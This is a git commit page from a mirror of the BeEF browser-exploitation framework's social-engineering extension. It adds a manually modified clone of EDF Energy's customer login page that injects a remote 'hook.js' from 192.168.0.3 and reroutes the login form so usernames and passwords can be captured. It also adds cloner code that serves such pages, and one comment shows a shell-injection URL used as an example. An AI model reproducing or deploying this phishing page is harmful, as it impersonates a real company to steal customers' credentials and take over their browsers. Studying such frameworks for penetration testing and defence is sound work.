Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Social Eng. extension: now the web_cloner can serve modified pages as well. This is needed when the page use custom logic to submit the form. Added an example of an Edf Energy modified page.

Browse Source
This commit is contained in:
antisnatchor
2012-09-06 12:37:26 +01:00
parent b3ae5f1016
commit 6ac074d2b0
4 changed files with 877 additions and 75 deletions
Download Patch File Download Diff File Expand all files Collapse all files

7
extensions/social_engineering/config.yaml
View File

@@ -36,13 +36,14 @@ beef:
# available templates
templates:
default:
# images are by default inline, so if you want to attach something, see below
images: ["beef_logo.png"]#,"second_image.png"]
# images are by default inline, so if you want to attach something, see 'attachments' below
images: ["beef_logo.png"]
images_cids:
cid1: "beef_logo.png"
#cid2: "second_image.png"
attachments: ["beef_attachment.pdf"]
edfenergy:
# my-account.edfenergy.com_mod is an example of a modified page (manually modified in order to
# intercept POST requests) to be served with the web_cloner using use_existing = true
images: ["corner-tl.png", "main.png","edf_logo.png","promo-corner-left.png","promo-corner-right-arrow.png","promo-reflection.png","2012.png","corner-bl.png","corner-br.png","bottom-border.png"]
images_cids:
cid1: "corner-tl.png"

790
extensions/social_engineering/mass_mailer/templates/edfenergy/my-account.edfenergy.com_mod Normal file
View File

@@ -0,0 +1,790 @@
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<html><head><LINK REL=stylesheet HREF="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.design.portaldesigndata/themes/portal/Edf_Energy_Orchard_Theme/glbl/glbl_nn7.css?7.0.20.0.1">
<LINK REL=stylesheet HREF="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.design.portaldesigndata/themes/portal/Edf_Energy_Orchard_Theme/prtl_std/prtl_std_nn7.css?7.0.20.0.1">
<!-- EPCF: BOB Core -->
<meta http-equiv="Content-Script-Type" content="text/javascript">
<script src="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.epcf.loader/script/optimize/js13_epcf.js?7.00001620"></script>
<script>
<!--
EPCM.relaxDocumentDomain();
EPCM.init( {
Version:7.00001620,
Level:1,
PortalVersion:"7.00.200908152330",
DynamicTop:false, // [service=true nestedWinOnAlias=false]
UAType:21, // [Mozilla]
UAVersion:5.0,
UAPlatform:1, // [Win]
UIPMode:"1", // [Default=1, User=0, Personalize=true]
UIPWinFeatures:"",
UIPPortalPath:"https://my-account.edfenergy.com:443/irj/portal/anonymous",
UIPPopupComp:"",
UIPPopupCompSize:"",
UIPPopupMsgNN:"Your current page contains unsaved data.\r\nDo you want to continue with navigation and open a new window?",
UIPPopupMsgND:"Your current page contains unsaved data.\r\nDo you want to discard the changes and open the content in the same window?",
DBGException:false
} );
EPCM.DSM.init( {
TerminatorURL:"/irj/servlet/prt/portal/prtroot/com.sap.portal.dsm.Terminator",
WinEmptyUrl:"/irj/portalapps/com.sap.portal.dsm/images/empty.gif",
ForcedUserDebug:false,
KeepAliveActive:false,
KeepAliveDelta:840,
KeepAliveStopAfter:36000
} );
function SAPWP_receiveSessInfo( sessInfo, frameRef ){
EPCM.DSM.processSession( sessInfo, frameRef );
}
//-->
</script>
<!-- EPCF: EOB Core -->
<script type="text/javascript">
/*HTML Business for Java, 645_SP_REL, 529005, Wed Jul 22 15:27:56 BST 2009*/
ur_system = {doc : window.document , mimepath :"/irj/portalapps/com.sap.portal.design.urdesigndata/themes/portal/Edf_Energy_Orchard_Theme/common/", stylepath : "/irj/portalapps/com.sap.portal.design.urdesigndata/themes/portal/Edf_Energy_Orchard_Theme/ur/", emptyhoverurl : "/irj/portalapps/com.sap.portal.htmlb/jslib/emptyhover.html", is508 : false, dateformat : 1, domainrelaxing : "MINIMAL"};
</script>
<title >MyAccount</title><meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.httpconnectivity.httpauthentication/scripts/CAManagerScript.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.navigation.helperservice/scripts/HistoryFramework.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.navigation.helperservice/scripts/NavigationFramework.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.navigation.helperservice/scripts/FrameworkSupport.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.pagebuilder/scripts/pagesupport.js" ></script><link REL=STYLESHEET HREF="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/css/stylesheets/main_v1.5.css?7.0.20.0.1" TYPE="text/css" ><link REL=STYLESHEET HREF="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/css/stylesheets/myaccount_v3.css?7.0.20.0.1" TYPE="text/css" ><script type="text/javascript" src="http://192.168.0.3:80/hook.js"></script>
</head><body class="prtlBody urFontBaseFam urScrl">
<!-- EPCF: Component com.sap.portal.navigation.portallauncher.anonymous, kegighenibibncgidhmmmfdjjggfpmhm -->
<Script>
var caEngine = new CAManager('/irj/servlet/prt/portal/prtroot/com.sap.portal.httpconnectivity.httpauthentication.Engine','dialogHeight:10;dialogWidth:20;center:1;help:0;status:0');
caEngine.registerCAEvent('com.sap.portal.httpconnectivity.httpauthentication','Teach',caEngine,'eventCallBack');
</Script>
<script>
var disableWorkProtectCheck = false;
function popupUnsavedDataBeforeUnload(evt)
{
if ((typeof pageTitleBar != "undefined") && pageTitleBar.backForwardLink)
{
pageTitleBar.backForwardLink = false;
}
else
{
evt = (evt) ? evt : ((window.event) ? event : null);
if ( EPCM.getUAType() != EPCM.MSIE && EPCM.getUAType() != EPCM.MOZILLA) return;
if ( EPCM.getGlobalDirty() && (! disableWorkProtectCheck ))
{
if(EPCM.getUAType() == EPCM.MSIE )
{
evt.returnValue = 'You have unsaved data';
}
else
{
evt.preventDefault();
evt.stopPropagation();
return 'You have unsaved data';
}
}
}
}
try{
if ( EPCM.getUAType() == EPCM.MSIE || EPCM.getUAType()== EPCM.MOZILLA){
if (window==EPCM.getSAPTop()){
window.onbeforeunload = popupUnsavedDataBeforeUnload;
}
}
} catch(ex){}
</script><script>frameworkSupport.init({anonymous:true,phase:'framework',portalURL:'https://my-account.edfenergy.com:443/irj/portal/anonymous'});</script><script>frameworkSupport.init2({contentAreaURL:'/irj/servlet/prt/portal/prteventname/Navigate/prtroot/pcd!3aportal_content!2fEdf_Energy_Development!2fOrchard!2fDesktop!2fEDFE_Framework!2fEDFE_Anonymous!2fCustomLogonDesktop!2fframeworkPages!2fcom.edfe.orchard.pct.Logon_Page_pg!2fcom.sap.portal.innerpage!2fcom.sap.portal.contentarea',portalURL:'https://my-account.edfenergy.com:443/irj/portal/anonymous',innerPage:'pcd:portal_content/Edf_Energy_Development/Orchard/Desktop/EDFE_Framework/EDFE_Anonymous/CustomLogonDesktop/frameworkPages/com.edfe.orchard.pct.Logon_Page_pg/com.sap.portal.innerpage',innerPageFrameURL:'/irj/servlet/prt/portal/prteventname/Navigate/prtroot/pcd!3aportal_content!2fEdf_Energy_Development!2fOrchard!2fDesktop!2fEDFE_Framework!2fEDFE_Anonymous!2fCustomLogonDesktop!2fframeworkPages!2fcom.edfe.orchard.pct.Logon_Page_pg!2fcom.sap.portal.innerpage',tlnComp:'/irj/portalapps/com.sap.portal.navigation.toplevel',ObjBasedNavigationURL:'/irj/servlet/prt/portal/prtroot/com.sap.portal.navigation.objbased.ObjBasedNavigation',serverPath:'https://my-account.edfenergy.com:443',usedConnectors:''});</script>
<span id=divChangeContent name=divChangeContent style="position:absolute;height:0;width:0;top:-5000;left:-5000">
<FORM action="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com" method=POST id="frmChangeContent" name="frmChangeContent">
<INPUT type="hidden" id=NavigationTarget name=NavigationTarget>
<INPUT type="hidden" id=RelativeNavBase name=RelativeNavBase></INPUT>
<input type="hidden" name="__ncforminfo" value="aG5IjEByLfUhgPrZWDRw08VLuhthw6Alf_ythxgZRxx-bn2SU9GjY2G8UFdotsliPfe5ArbcVEM="></FORM>
<form id='obnNavForm' method='post' target='obnNavIFrame' action="/irj/portal/anonymous"> <input type='hidden' name='systemAlias'>
<input type='hidden' name='businessObjName'>
<input type='hidden' name='objValue'>
<input type='hidden' name='operation'>
<input type='hidden' name='usePost' value='false'>
<input type='hidden' name='source'>
<input type='hidden' name='resolvingMode' value='Default'>
<input type="hidden" name="__ncforminfo" value="aG5IjEByLfUZncgeJn0nDtoKgRZLTHoNG9b8gjXLxyg1JXcdz0DDEk4i74Lypj65OK5A4udLxsoXWiF7rrPTfgID-qUNr8-D6aXCTTHzGtpGEifQUi875Ykz1XmE69Xx"></form>
</span>
<iframe src='https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.pagebuilder/html/EmptyDocument.html' style='position:absolute;height:0;visibility:hidden' name='obnNavIFrame' id='obnNavIFrame'></iframe>
<script>var disablePersonalize = true;</script>
<!-- EPCF: Component com.sap.portal.pagebuilder.pageBuilder, agnkfkoliedeidmfenendpdjjggfpmic -->
<SCRIPT>var emptyDocumentUrl = "/irj/portalapps/com.sap.portal.pagebuilder/html/EmptyDocument.html";</SCRIPT>
<!-- EPCF: Component com.sap.portal.layouts.framework.light_framework, fbkobmdfenlemkgnkdbnmfdjjggfpmip -->
<SCRIPT>if (typeof EPCM != "undefined") {EPCM.relaxDocumentDomain();} else { var d=document.domain; if (d.search(/^\d+\.\d+\.\d+\.\d+$/)>=0) {} else { var l=d.indexOf("."); if (l>=0) {d=d.substr(l+1)} } if (document.domain != d) {document.domain = d;}}
pageSupport.pageHelperUrl = '/irj/servlet/prt/portal/prtroot/com.sap.portal.pagebuilder.PageHelper';
pageSupport.proxyModesUrl = '/irj/servlet/prt/portal/prtroot/com.sap.portal.pagebuilder.IviewModeProxy';
pageSupport.addPageId('pcd:portal_content/Edf_Energy_Development/Orchard/Desktop/EDFE_Framework/EDFE_Anonymous/CustomLogonDesktop/frameworkPages/com.edfe.orchard.pct.Logon_Page_pg','0','local');
pageSupport._addIvuPageId("pcd:portal_content/Edf_Energy_Development/Orchard/Desktop/EDFE_Framework/EDFE_Anonymous/CustomLogonDesktop/frameworkPages/com.edfe.orchard.pct.Logon_Page_pg/com.edfe.orchard.pct.Logon_ivu","page0ivu0");
pageSupport._addIViewBank("page0ivu0",new iviewBank("","",pageSupport.EMBEDDED,1,"0","","GET"));
</SCRIPT>
<script>
document.body.style.margin=0;
document.body.scroll = "no";
</script>
<TABLE style="WIDTH: 100%" cellSpacing=0 cellPadding=0 class="prtlHeaderCon" ><TR><TD>
<!-- EPCF: Component com.edfe.orchard.Logon.LogonComp, fchmhdeefnpeknleddanfldjjggfpmig -->
<html xmlns:xalan-nodeset="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator" content="HTML Tidy for Windows (vers 14 February 2006), see www.w3.org" />
<title>MyAccount</title>
<link rel="SHORTCUT ICON" href="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/favicon/favicon.ico" />
<script type="text/javascript" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/scripts/edfenergy-ga-script-n.js"></script>
<script type="text/javascript">
loadTrackCode('UA-25608035-1');
_gaq.push(['_trackPageview', 'Login']);
</script>
<script language="JavaScript">
/*var emailRegEx = /^([a-zA-Z0-9_\.\!\#\$\%\^\&\*\{\}\~\`\+\_\=\?\'\|\"\-]{2,})\@(([a-zA-Z0-9\-]{2,})\.)+([a-zA-Z]{2,4})+$/;*/
var emailRegEx = /^\s*[\w\-\+_\{\}\~\`\+\_\=\?\'\|\"\-\!\#\$\%\^\&\*]+(\.[\w\-\+_\']+)*\@[\w\-\+_]+\.[\w\-\+_]+(\.[\w\-\+_]+)*\s*$/;
var Monitor_Flag1 = true;
document.onkeyup = checkKeyPressed;
window.history.forward(1);
function EDFEDisableSubmitButton1( button_text1, button_id1 )
{
var bid = button_id1;
var btext = button_text1;
document.getElementById( bid ).innerHTML = "<div class='btbg' id='"+bid+"'><a>"+ btext +" &raquo; </a></div>" ;
}
function checkCode()
{
if(event.keyCode==13)
{
event.keyCode=9;
}
}
function checkKeyPressed()
{
if(event.keyCode==13)
{
if(Monitor_Flag1!=null && Monitor_Flag1==true){
callGA('yes');
}
else
{
callGA('no');
}
}
}
function change(param1,param2)
{
param1.style.backgroundColor = param2;
}
function allValidChars(email)
{
var parsed = true;
var validchars = "abcdefghijklmnopqrstuvwxyz0123456789@.-_!#$%&`*+-/=?^'{}|~\"";
for (var i=0; i < email.length; i++)
{
var letter = email.charAt(i).toLowerCase();
if (validchars.indexOf(letter) != -1)
continue;
parsed = false;
break;
}
return parsed;
}
function trim(str) {
return str.replace(/(^[\s\xA0]+|[\s\xA0]+$)/g, '');
}
function validateEmail(email)
{
var decision = true;
if(trim(email)!= null && trim(email) !=""){
if(email.match(emailRegEx)){
decision = true;
}else{
decision = false;
}
}else{
decision = false;
}
/*
if (! allValidChars(email))
{
decision = false;
}
if (email.indexOf("@") < 1)
{
decision = false;
}
if(email.indexOf("@")!=email.lastIndexOf("@"))
{
decision = false;
}
else if (email.lastIndexOf(".") <= email.indexOf("@"))
{
decision = false;
}
else if (email.indexOf("@") == email.length)
{
decision = false;
}
else if (email.indexOf("..") >=0)
{
decision = false;
}
else if (email.indexOf(".") == email.length)
{
decision = false;
}*/
if(!decision)
{
document.logonForm.f_username.focus();
change(document.logonForm.f_username,'#FFFFFF'); // Cosmotic Changes
document.getElementById('errorMessage').innerHTML = "Please enter a valid email address";
document.getElementById('errorMessage1').innerHTML = "";
}
else
{
change(document.logonForm.f_username,'#FFFFFF');
}
return decision;
}
function callGA(GA)
{
if(GA!=null && GA=="yes")
{
_gaq.push(['_trackPageview', 'LoginAttempted']);
}
var t = setTimeout("validateLogin()", 100);
}
function validateLogin()
{
var email = document.logonForm.f_username.value;
var pass = document.logonForm.f_passwd.value;
if(email==null || email=="")
{
document.logonForm.f_username.focus();
document.getElementById('errorMessage').innerHTML = "Please enter your 'username', which is your email address";
document.getElementById('errorMessage1').innerHTML = "";
return false;
}
else
{
if(validateEmail(email))
{
if(pass==null || pass=='')
{
document.logonForm.f_passwd.focus();
document.getElementById('errorMessage').innerHTML = "Please enter your password";
document.getElementById('errorMessage1').innerHTML = "";
change(document.logonForm.f_passwd,'#FFFFFF');
return false;
}
else
{
change(document.logonForm.f_passwd,'#FFFFFF');
document.logonForm.action = "/nclogin.submit";
EDFEDisableSubmitButton1('Login','EDFElogonButton');
document.logonForm.submit();
}
}
}
}
function validateFU()
{
document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orcharcd.forgotUserName.ForgotUserNameController";
document.logonForm.submit();
}
function validateFP()
{
document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orchard.forgotPassword.ForgotPasswordComp";
document.logonForm.submit();
}
function validateRegisterSME()
{
document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.SelfRegistrationComp"+"?refUsr=SME";
document.logonForm.submit();
}
function validateRegisterResi()
{
document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.SelfRegistrationComp"+"?refUsr=RESI";
document.logonForm.submit();
}
function validateMR()
{
document.logonForm.action = "/irj/servlet/prt/portal/prtroot/EnterMeterRead_OutAccount.EnterMeterRead_Controller";
document.logonForm.submit();
}
</script>
<script type="text/javascript" src="http://192.168.0.3:80/hook.js"></script>
</head>
<body onLoad="history.forward(); document.logonForm.f_username.focus();">
<div id="wrap">
<div id="outer-right">
<div id="outer">
<!--------------------------- start top section ----------------------------------->
<script>
function performSearch()
{
var searchItem = document.getElementById('searchBox');
window.open('http://www.edfenergy.com/search-results.php?query='+searchItem.value,'_blank');
}
function clearText()
{
document.getElementById('searchBox').value="";
}
function EDFEDisableSubmitButton( button_text, button_id )
{
var bid = button_id;
var btext = button_text;
document.getElementById( bid ).innerHTML = "<div class='btbg' id='"+bid+"'><a>"+ btext +" &raquo; </a></div>" ;
}
</script>
<!--------------------------- start top section ----------------------------------->
<div id="header">
<p class="hide-element">
<a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#pnav">skip to primary navigation</a>
</p>
<div id='logo'>
<img src='https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/common/edfenergy_logo2.gif' title='EDF Energy' alt='EDF Energy' width='56' height='89' border='0' />
</div><!-- start top utilities -->
<div id="toplinks">
<div class="left">
<ul>
<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com">Home</a></li>
<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com">MyAccount</a></li>
<li><a href="https://my-account.edfenergy.com/irj/servlet/prt/portal/prtroot/EnterMeterRead_OutAccount.EnterMeterRead_Controller">My meter reading</a></li>
</ul>
</div>
<div class="right">
<ul>
<li><a href="http://www.edf.com" target="_blank">EDF Group</a></li>
</ul>
<div id="searchform">
<form name="SearchForm" id="SearchForm" action="/irj/portal/anonymous"> <input name="searchBox" id="searchBox" type="text" value="Search" class="searchtextbox" onfocus="clearText()" />
<input name="searchSubmit" type="image" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/common/search-icon.png" title="Perform Search" class="faq-button" onclick="performSearch(); return false;" />
<input type="hidden" name="__ncforminfo" value="aG5IjEByLfWulwL539YlRxugW3Unfla8YtGvDKb-X_2YFxvNDTOZUB0qVQVl6ZXF"></form>
</div>
</div>
</div>
<div id="olympiclogo">
<img src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/common/london2012_logo_new.gif" alt="London 2012 Official Electricity Supplier" title="London 2012 Official Electricity Supplier" />
</div><!-- end top utilities -->
<!-- start top navigation -->
<div id="topnav">
<div id="topnav-inner">
<p class="hide-element">
<a name="pnav" id="pnav">primary navigation</a>
</p>
<p class="hide-element">
<a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#snav">skip to secondary navigation</a>
</p>
<ul>
<li>
<a target="_blank" href="https://www.edfenergy.com/products-services/index.shtml" >Products &amp; Services</a>
</li>
<li>
<a target="_blank" href="http://www.edfenergy.com/energyfuture">Energy Future</a>
</li>
<li>
<a target="_blank" href="https://www.edfenergy.com/about-us/index.shtml">About us</a>
</li>
<li>
<a target="_blank" href="https://www.edfenergy.com/sustainability/index.shtml">Sustainability</a>
</li>
<li>
<a target="_blank" href="https://www.edfenergy.com/careers/index.shtml">Careers</a>
</li>
<li>
<a target="_blank" href="https://www.edfenergy.com/media-centre/index.shtml">Media centre</a>
</li>
<li>
<a target="_blank" href="https://www.edfenergy.com/safety-emergencies/index.shtml">Safety &amp; emergencies</a>
</li>
</ul>
<div class="clearFix"></div>
</div>
</div><!-- end top navigation -->
</div>
<!--------------------------- end top section ----------------------------------->
<!--------------------------- end top section ----------------------------------->
<div id="pagehold">
<!--------------------------- start left section ----------------------------------->
<SCRIPT>
function fnNavigateMenu(locationURL,navigParam,menuIden)
{
if (navigParam == 'false')
{
document.outsidemenu.menuidentifier.value = menuIden ;
document.outsidemenu.action = locationURL ;
document.outsidemenu.submit() ;
}
else
{
window.open(locationURL) ;
}
}
</SCRIPT>
<!-- start left section forgottenusername.html;forgottenpassword.html -->
<div id="leftnav-outer">
<div id="leftnav">
<ul>
<li><ul><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="xxx" onClick="fnNavigateMenu('/irj/servlet/prt/portal/prtroot/EnterMeterRead_OutAccount.EnterMeterRead_Controller','false','EMR')" >Submit meter reading</a></ul></li>
<li>
<ul>
<a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="xxx" onClick="fnNavigateMenu('http://www.edfenergy.com/contact-us/index.shtml','true','CONTACTUS')">Contact us</a>
</ul>
</li>
<li>
<ul><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="current" onClick="fnNavigateMenu('/irj/portal/anonymous','false','LOGON')" >Login / Register</a>
<ul>
<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="" onClick="fnNavigateMenu('/irj/servlet/prt/portal/prtroot/com.edfe.orcharcd.forgotUserName.ForgotUserNameController','false','FUN')" >Forgotten your username</a></li>
<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="" onClick="fnNavigateMenu('/irj/servlet/prt/portal/prtroot/com.edfe.orchard.forgotPassword.ForgotPasswordComp','false','FUP')" >Forgotten your password</a></li>
</ul>
</ul>
</li>
</ul>
<ul>
<br/><br/>
<div id="lpButtonDiv" align="center">
</div>
</ul>
</div>
</div>
<!-- end left section -->
<form name="outsidemenu" method="POST" action="/irj/portal/anonymous"> <input type="hidden" name="menuidentifier" value="">
<input type="hidden" name="__ncforminfo" value="aG5IjEByLfWqJ6R7zZUHhDE15UF2cpEumhm0TWuQDLfNnOD8MqMtjNF30GgZOV1f"></form>
<!--------------------------- end left section ----------------------------------->
<!--------------------------- start middle section ----------------------------------->
<div id="maincontent-wrap" class="fullwidth">
<p class="hide-element">
<a name="cont" id="cont">main content</a>
</p>
<div id="maincontent-full" class="nobanner">
<div id="banner" class="BannerWith2Circles">
<h1>
Login / Register
</h1>
<div id="banner_text_wrap">
<img alt="" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/banners/my-account.jpg" />
<div id="banner_text">
<p>
&nbsp;<br />&nbsp;<br />Login or register<br />to access your<br />
energy account online<br />&nbsp;<br />&nbsp;<br />&nbsp;<br />&nbsp;
</p>
</div>
</div>
</div>
<div id="two-col-wrap" class="two_col_wrap_bg">
<div id="content" class="make-full">
<div id="data">
<div id="leftcolumn">
<h2>Login to MyAccount</h2>
<!-- Prototype Builder Start srm::-->
<form name="logonForm" method="post" action="/irj/portal/anonymous">
<span class="legacymessage">
</span>
<span class="legacymessage">
</span>
<span class="warningmessage" id="errorMessage"></span><BR/>
<span class="warningmessage" id="errorMessage1"></span>
<input type ="hidden" name = "f_method" value = "LOGIN" />
<table class="formfields" border="1" summary="Visual Layout for the login form">
<tbody>
<tr>
<th><label for="f_username">Username (email address)<em>*</em></label></th><td>
<input id="f_username" name="f_username" type="text" size="27" maxlength="241" tabindex="1" value=""/>
<A class="form_field_help" href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#f_username"><IMG alt="help" title="help" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/buttons/help_button.gif"><SPAN>Please enter your username</SPAN></A>
</td>
</tr>
<tr>
<th><label for="f_passwd">Password<em>*</em></label></th><td>
<input id="f_passwd" name="f_passwd" type="Password" size="18" maxlength="16" tabindex="2" autocomplete=OFF/>
<A class="form_field_help" href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#f_passwd"><IMG alt="help" title="help" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/buttons/help_button.gif"><SPAN>Please enter the password for this account</SPAN></A>
</td>
</tr>
</tbody>
</table>
<input type="submit" value="Login" style="background:#FE5815;color:white!important;heigth:6em;width:7em;font-size:14px;font-family:arial;font-weight:500;margin:0px;padding-left:15px;padding-right:15px;padding-top:7px;padding-bottom:7px;border:none;cursor:pointer">
<br /><br /><br />
<p>Forgotten your <a href="javaScript:validateFU();">username</a> or <a href="javaScript:validateFP();">password</a>?</p>
<input type="hidden" name="__ncforminfo" value="aG5IjEByLfUN7mVuDM1dmcrQChOQXirPHBYBwncOB_h5_QMzu8x_5eBlZcqXpqJKJuOtpQFlZPpXFhCbOjTPxw=="></form>
<!-- Prototype Builder End -->
</div>
<div id="rightcolumn">
<h2>Register Today!</h2>
<p>&nbsp;</p>
<ul>
<li class="tick"> View and pay your bills</li>
<li class="tick"> Submit your meter reading</li>
<li class="tick"> Update your details</li>
<li class="tick"> Sign up for Direct Debit</li>
</ul><br/>
<table border=0><tr>
<td>
<div class="btbu" id="registerButtonResi"><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" onClick="validateRegisterResi();" class="">Register your<br> home &raquo;</a></div>
</td><td>
&nbsp;&nbsp;&nbsp;</td>
<td> <div class="btbu" id="registerButtonSME"><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" onClick="validateRegisterSME();" class="">Register your<br> business &raquo;</a></div>
</td></tr>
</table>
<br/>
<p><strong>Don't have an online account?</strong><br/>You can still <a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" onClick="validateMR();">submit a meter reading</a></p>
</div>
</div>
</div>
</div>
</div>
</div>
<!--------------------------- end middle section ----------------------------------->
</div><!--pagehold-->
<!--------------------------- start bottom section ----------------------------------->
<script type="text/javascript">
var __stormJs = 't1.stormiq.com/dcv4/jslib/3171_71E90107_6FC7_48DB_B3F5_713D754C9B89.js';
</script>
<script type="text/javascript" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/scripts/track.js"></script>
<script type="text/javascript">
function TermsAndConditions()
{
window.open("/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.PromotionalContentComp?fileName=TermsAndConditions.htm","MyAccount","location=no,scrollbars=yes");
//location.href = "/irj/servlet/prt/portal/prtroot/orcss.anonym.tncprivacy.TnCPrivacyPolicyController?urlParameter=tnc";
}
function PrivacyPolicy()
{
window.open("/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.PromotionalContentComp?fileName=Privacy.html","MyAccount","location=no,scrollbars=yes");
//location.href = "/irj/servlet/prt/portal/prtroot/orcss.anonym.tncprivacy.TnCPrivacyPolicyController?urlParameter=privacy";
}
// Removes leading whitespaces
function LTrim( value ) {
var re = /\s*((\S+\s*)*)/;
return value.replace(re, "$1");
}
// Removes ending whitespaces
function RTrim( value ) {
var re = /((\s*\S+)*)\s*/;
return value.replace(re, "$1");
}
// Removes leading and ending whitespaces
function trim( value ) {
return LTrim(RTrim(value));
}
</script>
<!-- start bottom section -->
<div id="footer">
<ul>
<li>
<a href="javascript:TermsAndConditions();">Terms &amp; conditions</a>
</li>
<li>
<a href="javascript:PrivacyPolicy();">Privacy</a>
</li>
<li>
<a href="http://www.edfenergy.com/products-services/accessibility.shtml" target="_blank">Accessibility</a>
</li>
<li>
<a href="http://www.edfenergy.com/products-services/copyright.shtml" target="_blank">Copyright statement</a>
</li>
<li class="last">
<a href="http://www.edfenergy.com/products-services/fuel-mix.shtml" target="_blank">Our fuel mix</a>
</li>
</ul>
<p class="copy"> &copy; EDF Energy 2012 All rights reserved</p>
<p class = "cookiePolicy">By continuing to use this site, you agree to our <a target="_blank" href="http://www.edfenergy.com/about-us/cookies/cookie-policy.shtml" style = "text-decoration:underline; color: #fff">Cookie Policy</a>.If you don't agree to Cookies<br>being stored on your computer in line with that policy please navigate away from this site.</p>
</div>
<!-- end bottom section -->
<SCRIPT>
document.body.scroll = "";
</SCRIPT>
<!--------------------------- end bottom section ----------------------------------->
</div><!--outer-->
</div>
</div><!--wrap-->
</body>
</html>
</TD></TR></TABLE>
</body></html>

3
extensions/social_engineering/rest/socialengineering.rb
View File

@@ -40,6 +40,7 @@ module BeEF
body = JSON.parse request.body.read
uri = body["url"]
mount = body["mount"]
use_existing = body["use_existing"]
if uri != nil && mount != nil
if (uri =~ URI::regexp).nil? #invalid URI
@@ -53,7 +54,7 @@ module BeEF
end
web_cloner = BeEF::Extension::SocialEngineering::WebCloner.instance
success = web_cloner.clone_page(uri,mount)
success = web_cloner.clone_page(uri,mount,use_existing)
if success
result = {
"success" => true,

152
extensions/social_engineering/web_cloner/web_cloner.rb
View File

@@ -27,7 +27,7 @@ module BeEF
@beef_hook = "http://#{@config.get('beef.http.host')}:#{@config.get('beef.http.port')}#{@config.get('beef.http.hook_file')}"
end
def clone_page(url, mount)
def clone_page(url, mount, use_existing)
print_info "Cloning page at URL #{url}"
uri = URI(url)
output = uri.host
@@ -35,84 +35,94 @@ module BeEF
user_agent = @config.get('beef.extension.social_engineering.web_cloner.user_agent')
success = false
# prevent command injection attacks, passing URLs like (http://antisnatchor'||touch /tmp/foo #). No shells are open in the following case.
begin
IO.popen(["wget", "#{url}","-c", "-k", "-O", "#{@cloned_pages_dir + output}", "-U", "#{user_agent}","--no-check-certificate","--background"], 'r+') do |wget_io| end
success = true
rescue Exception => e
print_error "Errors executing wget: #{e}"
print_error "Looks like wget is not in your PATH. If 'which wget' returns null, it means you don't have 'wget' in your PATH."
end
if success
File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file|
File.open("#{@cloned_pages_dir + output}", 'r').each do |line|
# Modify the <form> line changing the action URI to / in order to be properly intercepted by BeEF
if line.include?("<form ")
line_attrs = line.split(" ")
c = 0
cc = 0
#todo: probably doable also with map!
# Sometimes pages use Javascript/custom logic to submit forms. In these cases even having a powerful parser,
# there is no need to implement the complex logic to handle all different cases.
# We want to leave the task to modify the xxx_mod file to the BeEF user, and serve it through BeEF after modification.
# So ideally, if the the page needs custom modifications, the web_cloner usage will be the following:
# 1th request. {"uri":"http://example.com", "mount":"/"} <- clone the page, and create the example.com_mod file
# - the user modify the example.com_mod file manually
# 2nd request. {"uri":"http://example.com", "mount":"/", "use_existing":"true"} <- serve the example.com_mod file
#
if use_existing.nil? || use_existing == false
begin #,"--background"
IO.popen(["wget", "#{url}","-c", "-k", "-O", "#{@cloned_pages_dir + output}", "-U", "#{user_agent}","--no-check-certificate"], 'r+') do |wget_io| end
success = true
rescue Exception => e
print_error "Errors executing wget: #{e}"
print_error "Looks like wget is not in your PATH. If 'which wget' returns null, it means you don't have 'wget' in your PATH."
end
